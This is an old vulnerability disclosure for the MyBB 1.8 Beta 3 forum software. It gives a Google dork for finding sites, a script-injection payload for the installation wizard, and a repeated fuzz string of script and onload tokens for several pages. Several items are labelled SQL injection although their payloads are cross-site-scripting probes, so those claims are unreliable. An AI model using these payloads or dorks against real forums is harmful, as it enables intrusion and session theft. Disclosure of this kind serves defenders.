# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection# Google Dork: intext:"Powered By MyBB"# Date: 15.08.2014# Author: DemoLisH# Vendor Homepage: http://www.mybb.com/# Software Link: http://www.mybb.com/downloads# Version: 1.8 - Beta 3# Contact: onur@b3yaz.org***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL-with your code,for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.
b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox,for example:localhost/private.php
Search at the following code Keywords:<foo><h1><script> alert (bar)();// ' " >< prompt \x41 %42 constructor onload
c) SQL Injection in Showthread
Go to -> Show Thread,for example:localhost/showthread.php?tid=1
Search at the following code Keywords:<foo><h1><script> alert (bar)();// ' " >< prompt \x41 %42 constructor onload
d) SQL Injection in Search
Go to -> Search,for example:localhost/search.php
Search at the following code Keywords:<foo><h1><script> alert (bar)();// ' " >< prompt \x41 %42 constructor onload
e) SQL Injection in Help Documents
Go to -> Help Documents,for example:localhost/misc.php?action=help
Search at the following code Keywords:<foo><h1><script> alert (bar)();// ' " >< prompt \x41 %42 constructor onload
f) SQL Injection in Forum Display
Go to -> Forum Display,for example:localhost/forumdisplay.php?fid=2
Search at the following code "Search this Forum":<foo><h1><script> alert (bar)();// ' " >< prompt \x41 %42 constructor onload
***************************************************[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
